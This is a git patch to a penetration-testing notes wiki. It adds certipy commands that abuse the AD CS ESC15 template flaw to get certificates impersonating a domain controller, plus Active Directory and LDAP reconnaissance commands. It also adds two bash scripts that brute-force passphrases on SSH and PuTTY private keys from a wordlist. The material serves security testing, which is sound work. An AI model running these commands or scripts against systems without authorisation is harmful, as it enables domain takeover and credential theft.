From d62fadcee1d872f0f5bc463f1afa7b623fb86172 Mon Sep 17 00:00:00 2001 From: Sam Freeside Date: Wed, 30 Oct 2024 23:03:35 +0300 Subject: [PATCH] [AHK] Automatic update :alien: --- SUMMARY.md | 1 + .../infrastructure/ad/ad-cs-abuse/esc15.md | 8 +-- .../infrastructure/ad/lateral-movement/rdp.md | 6 ++ pentest/infrastructure/ad/ldap-ldaps.md | 12 +++- pentest/perimeter/ssh.md | 61 +++++++++++++++++++ redteam/maldev/winapi.md | 1 + 6 files changed, 82 insertions(+), 7 deletions(-) diff --git a/SUMMARY.md b/SUMMARY.md index 6ffd770..778cc77 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -17,6 +17,7 @@ - [ESC1](pentest/infrastructure/ad/ad-cs-abuse/esc1.md) - [ESC4](pentest/infrastructure/ad/ad-cs-abuse/esc4.md) - [ESC8](pentest/infrastructure/ad/ad-cs-abuse/esc8.md) + - [ESC15](pentest/infrastructure/ad/ad-cs-abuse/esc15.md) - [Golden Certificate](pentest/infrastructure/ad/ad-cs-abuse/golden-certificate.md) * [ADIDNS Abuse](pentest/infrastructure/ad/adidns-abuse.md) * [Attack Trusts](pentest/infrastructure/ad/attack-trusts.md) diff --git a/pentest/infrastructure/ad/ad-cs-abuse/esc15.md b/pentest/infrastructure/ad/ad-cs-abuse/esc15.md index fe7f37a..53bb6af 100644 --- a/pentest/infrastructure/ad/ad-cs-abuse/esc15.md +++ b/pentest/infrastructure/ad/ad-cs-abuse/esc15.md @@ -13,13 +13,13 @@ description: Inject Application Policies into Version 1 Certificate Templates Get enabled templates: -``` +```powershell PS > $enabledTemplates = Get-ADObject -LDAPFilter "(&(objectClass=pKIEnrollmentService))" -SearchBase "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,$((Get-ADRootDSE).rootDomainNamingContext)" -Properties certificateTemplates | select -ExpandProperty certificateTemplates ``` Get v1 templates with `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` that are enabled: -``` +```powershell PS > Get-ADObject -Filter 'objectClass -eq "pKICertificateTemplate"' -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,$((Get-ADRootDSE).rootDomainNamingContext)" -Property name,msPKI-Template-Schema-Version,msPKI-Certificate-Name-Flag | ? {$_.'msPKI-Template-Schema-Version' -eq 1 -and ($_.'msPKI-Certificate-Name-Flag' -band 0x00000001)} | ? {$enabledTemplates -contains $_.name} ``` @@ -34,7 +34,7 @@ PS > Get-ADObject -Filter 'objectClass -eq "pKICertificateTemplate"' -SearchBase Abusing **Client Authentication**: -``` +```bash $ proxychains4 certipy req -u snovvcrash@megacorp.local -p 'Passw0rd!' -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template VulnTemplate --application-policies '1.3.6.1.5.5.7.3.2' -upn 'DC01$@megacorp.local' -sid -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp ``` @@ -44,7 +44,7 @@ $ proxychains4 certipy req -u snovvcrash@megacorp.local -p 'Passw0rd!' -ca CorpC Abusing **Certificate Request Agent**: -``` +```bash $ proxychains4 certipy req -u snovvcrash@megacorp.local -p 'Passw0rd!' -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template VulnTemplate --application-policies '1.3.6.1.4.1.311.20.2.1' -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp $ proxychains4 certipy req -u snovvcrash@megacorp.local -p 'Passw0rd!' -pfx snovvcrash.pfx -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template User -on-behalf-of 'MEGACORP\DC01$' -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp ``` diff --git a/pentest/infrastructure/ad/lateral-movement/rdp.md b/pentest/infrastructure/ad/lateral-movement/rdp.md index 73a32ab..231f115 100644 --- a/pentest/infrastructure/ad/lateral-movement/rdp.md +++ b/pentest/infrastructure/ad/lateral-movement/rdp.md @@ -7,6 +7,12 @@ description: Remote Desktop Protocol * [https://syfuhs.net/how-authentication-works-when-you-use-remote-desktop](https://syfuhs.net/how-authentication-works-when-you-use-remote-desktop) * [https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3](https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3) +Look for terminal servers in a domain: + +```powershell +PS > Get-ADComputer -LDAPFilter "(&(objectClass=computer)(memberOf=CN=Terminal Server License Servers,CN=Builtin,$((Get-ADRootDSE).rootDomainNamingContext)))" | select dNSHostName +``` + diff --git a/pentest/infrastructure/ad/ldap-ldaps.md b/pentest/infrastructure/ad/ldap-ldaps.md index b289c0b..adaffc1 100644 --- a/pentest/infrastructure/ad/ldap-ldaps.md +++ b/pentest/infrastructure/ad/ldap-ldaps.md @@ -12,6 +12,12 @@ description: Lightweight Directory Access Protocol ![LDAP Authentication Protocols (Almond)](/.gitbook/assets/012.png) +Check if LDAPS was ever correctly configured: + +``` +$ openssl s_client -host 192.168.1.11 -port 636 +``` + @@ -91,7 +97,7 @@ Function DecodeUserAccountControl ([int]$UAC) - [https://github.com/zyn3rgy/LdapRelayScan](https://github.com/zyn3rgy/LdapRelayScan) -Scan for LDAP Singing and LDAP Channel Binding: +Scan for LDAP Singing and LDAPS Channel Binding: ``` $ python3 LdapRelayScan.py -method BOTH -dc-ip 192.168.1.11 -u snovvcrash -p 'Passw0rd!' @@ -101,7 +107,7 @@ $ for dc in `cat discover/hosts/dc_ip.txt`; do cme ldap $dc -u snovvcrash -p 'Pa -### LDAP Signing & LDAP Channel Binding +### LDAP Signing & LDAPS Channel Binding - [https://offsec.almond.consulting/bypassing-ldap-channel-binding-with-starttls.html](https://offsec.almond.consulting/bypassing-ldap-channel-binding-with-starttls.html) @@ -116,7 +122,7 @@ If `LdapServerIntegrity` is set to `2`, LDAP Signing is required: PS > Get-ItemProperty "HKLM:\System\CurrentControlSet\Services\NTDS\Parameters\" -Name LdapServerIntegrity ``` -If `LdapEnforceChannelBinding` is set to `2`, LDAP Channel Binding is **always** required: +If `LdapEnforceChannelBinding` is set to `2`, LDAPS Channel Binding is **always** required: ``` PS > Get-ItemProperty "HKLM:\System\CurrentControlSet\Services\NTDS\Parameters\" -Name LdapEnforceChannelBinding diff --git a/pentest/perimeter/ssh.md b/pentest/perimeter/ssh.md index e197fd0..4d8e16a 100644 --- a/pentest/perimeter/ssh.md +++ b/pentest/perimeter/ssh.md @@ -59,6 +59,67 @@ $ nmap -p 22 --script ssh-publickey-acceptance --script-args "ssh.usernames={'ro +## Quicky Offline Private Key Crack + +- [https://security.stackexchange.com/a/191122](https://security.stackexchange.com/a/191122) + +{% tabs %} +{% tab title="PEM/OpenSSH" %} +{% code title="pem-crack.sh" %} +```bash +#!/usr/bin/env bash + +echo "Wordlist : $1" +echo "PEM key : $2" +echo "New PEM key : $3" +cp "$2" "$3" && chmod 600 "$3" + +while read -r line +do + err=$( (ssh-keygen -p -P "$line" -N '' -f "$3") 2>&1 ) + + if [[ ! $err = *"incorrect passphrase"* ]]; then + echo "Passphrase : $line" + echo "$err" + break + fi +done < "$1" +``` +{% endcode %} +{% endtab %} +{% tab title="PuTTY PPK" %} +{% code title="ppk-crack.sh" %} +```bash +#!/usr/bin/env bash +# sudo apt install putty-tools -y + +echo "Wordlist : $1" +echo "PEM key : $2" +echo "New PEM key : $3" + +touch /tmp/empty +while read -r line +do + echo "$line" > /tmp/w + err=$( (puttygen "$2" -P -o "$3" --old-passphrase /tmp/w --new-passphrase /tmp/empty) 2>&1 ) + + if [[ ! $err = *"wrong passphrase"* ]]; then + echo "Passphrase : $line" + echo "$err" + puttygen "$3" -O private-openssh -o "$3" + break + fi +done < $1 + +rm -f /tmp/w /tmp/empty +``` +{% endcode %} +{% endtab %} +{% endtabs %} + + + + ## Enum Users **CVE-2018-15473** diff --git a/redteam/maldev/winapi.md b/redteam/maldev/winapi.md index 0386921..df42f21 100644 --- a/redteam/maldev/winapi.md +++ b/redteam/maldev/winapi.md @@ -13,3 +13,4 @@ ## Tools - [https://github.com/MalwareApiLib/MalwareApiLibrary](https://github.com/MalwareApiLib/MalwareApiLibrary) +- [https://www.leeholmes.com/managing-ini-files-with-powershell/](https://www.leeholmes.com/managing-ini-files-with-powershell/)